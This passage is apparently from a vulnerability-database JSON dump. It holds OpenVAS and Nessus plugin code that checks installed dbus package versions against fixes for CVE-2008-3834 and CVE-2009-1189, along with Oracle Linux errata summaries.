rpm:\"libdbus-1_3~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3-devel\", rpm:\"libdbus-1_3-devel~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3-devel\", rpm:\"lib64dbus-1_3-devel~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "Check for the Version of dbus", "modified": "2017-12-22T00:00:00", "published": "2010-01-15T00:00:00", "id": "OPENVAS:870201", "href": "http://plugins.openvas.org/nasl.php?oid=870201", "type": "openvas", "title": "RedHat Update for dbus RHSA-2010:0018-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for dbus RHSA-2010:0018-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"D-Bus is a system for sending messages between applications. It is used for\n the system-wide message bus service and as a per-user-login-session\n messaging facility.\n\n It was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\n not correctly fix the denial of service flaw in the system for sending\n messages between applications. A local user could use this flaw to send a\n message with a malformed signature to the bus, causing the bus (and,\n consequently, any process using libdbus to receive messages) to abort.\n (CVE-2009-1189)\n \n Note: Users running any application providing services over the system\n message bus are advised to test this update carefully before deploying it\n in production environments.\n \n All users are advised to upgrade to these updated packages, which contain a\n backported patch to correct this issue. For the update to take effect, all\n running instances of dbus-daemon and all running applications using the\n libdbus library must be restarted, or the system rebooted.\";\n\ntag_affected = \"dbus on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-January/msg00003.html\");\n script_id(870201);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0018-01\");\n script_cve_id(\"CVE-2009-1189\", \"CVE-2008-3834\");\n script_name(\"RedHat Update for dbus RHSA-2010:0018-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dbus\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-debuginfo\", rpm:\"dbus-debuginfo~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-libs\", rpm:\"dbus-libs~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:56:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dbus-1\n dbus-1-devel\n dbus-1-glib\n dbus-1-gtk\n dbus-1-java\n dbus-1-mono\n dbus-1-python\n dbus-1-qt\n dbus-1-qt3\n dbus-1-qt3-devel\n dbus-1-x11\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:65851", "href": "http://plugins.openvas.org/nasl.php?oid=65851", "type": "openvas", "title": "SLES10: Security update for dbus", "sourceData": "#\n#VID slesp2-dbus-1-5701\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for dbus\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dbus-1\n dbus-1-devel\n dbus-1-glib\n dbus-1-gtk\n dbus-1-java\n dbus-1-mono\n dbus-1-python\n dbus-1-qt\n dbus-1-qt3\n dbus-1-qt3-devel\n dbus-1-x11\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65851);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-3834\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"SLES10: Security update for dbus\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus-1\", rpm:\"dbus-1~0.60~33.20\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-devel\", rpm:\"dbus-1-devel~0.60~33.20\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-glib\", rpm:\"dbus-1-glib~0.60~33.20\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-gtk\", rpm:\"dbus-1-gtk~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-java\", rpm:\"dbus-1-java~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-mono\", rpm:\"dbus-1-mono~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-python\", rpm:\"dbus-1-python~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-qt\", rpm:\"dbus-1-qt~4.3.4~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-qt3\", rpm:\"dbus-1-qt3~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-qt3-devel\", rpm:\"dbus-1-qt3-devel~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-x11\", rpm:\"dbus-1-x11~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "description": "Check for the Version of dbus", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880669", "href": "http://plugins.openvas.org/nasl.php?oid=880669", "type": "openvas", "title": "CentOS Update for dbus CESA-2009:0008 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dbus CESA-2009:0008 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"D-Bus is a system for sending messages between applications. It is used for\n the system-wide message bus service and as a per-user-login-session\n messaging facility.\n\n A denial-of-service flaw was discovered in the system for sending messages\n between applications. A local user could send a message with a malformed\n signature to the bus causing the bus (and, consequently, any process using\n libdbus to receive messages) to abort. (CVE-2008-3834)\n \n All users are advised to upgrade to these updated dbus packages, which\n contain backported patch which resolve this issue. For the update to take\n effect, all running instances of dbus-daemon and all running applications\n using libdbus library must be restarted, or the system rebooted.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"dbus on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-January/015530.html\");\n script_id(880669);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2009:0008\");\n script_cve_id(\"CVE-2008-3834\");\n script_name(\"CentOS Update for dbus CESA-2009:0008 centos5 i386\");\n\n script_summary(\"Check for the Version of dbus\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "description": "The remote host is missing updates to dbus announced in\nadvisory CESA-2009:0008.", "modified": "2017-07-10T00:00:00", "published": "2009-01-13T00:00:00", "id": "OPENVAS:63181", "href": "http://plugins.openvas.org/nasl.php?oid=63181", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:0008 (dbus)", "sourceData": "#CESA-2009:0008 63181 2\n# $Id: ovcesa2009_0008.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:0008 (dbus)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:0008\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:0008\nhttps://rhn.redhat.com/errata/RHSA-2009-0008.html\";\ntag_summary = \"The remote host is missing updates to dbus announced in\nadvisory CESA-2009:0008.\";\n\n\n\nif(description)\n{\n script_id(63181);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-13 22:38:32 +0100 (Tue, 13 Jan 2009)\");\n script_cve_id(\"CVE-2008-3834\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:0008 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:34", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "[1.1.2-12.el5_4.1]\n- CVE-2009-1189 dbus: invalid fix for CVE-2008-3834 ", "edition": 4, "modified": "2010-01-07T00:00:00", "published": "2010-01-07T00:00:00", "id": "ELSA-2010-0018", "href": "http://linux.oracle.com/errata/ELSA-2010-0018.html", "title": "dbus security update", "type": "oraclelinux", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:35", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": "[1.0.0-7.el5_2.1]\n- CVE-2008-3834\n- Resolves: #466226", "edition": 4, "modified": "2009-01-07T00:00:00", "published": "2009-01-07T00:00:00", "id": "ELSA-2009-0008", "href": "http://linux.oracle.com/errata/ELSA-2009-0008.html", "title": "dbus security update", "type": "oraclelinux", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-01-01T04:36:12", "description": "From Red Hat Security Advisory 2010:0018 :\n\nUpdated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : dbus (ELSA-2010-0018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:dbus", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:dbus-x11", "p-cpe:/a:oracle:linux:dbus-libs", "p-cpe:/a:oracle:linux:dbus-devel"], "id": "ORACLELINUX_ELSA-2010-0018.NASL", "href": "https://www.tenable.com/plugins/nessus/67981", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0018 and \n# Oracle Linux Security Advisory ELSA-2010-0018 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67981);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/25 13:36:08\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_bugtraq_id(31602);\n script_xref(name:\"RHSA\", value:\"2010:0018\");\n\n script_name(english:\"Oracle Linux 5 : dbus (ELSA-2010-0018)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0018 :\n\nUpdated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-January/001309.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dbus packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dbus-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dbus-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dbus-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"dbus-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"dbus-devel-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"dbus-libs-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"dbus-x11-1.1.2-12.el5_4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus / dbus-devel / dbus-libs / dbus-x11\");\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-01T04:57:26", "description": "Updated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.", "edition": 26, "published": "2010-01-08T00:00:00", "title": "RHEL 5 : dbus (RHSA-2010:0018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:dbus-libs", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:dbus", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:dbus-devel", "p-cpe:/a:redhat:enterprise_linux:dbus-x11"], "id": "REDHAT-RHSA-2010-0018.NASL", "href": "https://www.tenable.com/plugins/nessus/43819", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0018. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43819);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:14\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_bugtraq_id(31602);\n script_xref(name:\"RHSA\", value:\"2010:0018\");\n\n script_name(english:\"RHEL 5 : dbus (RHSA-2010:0018)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n 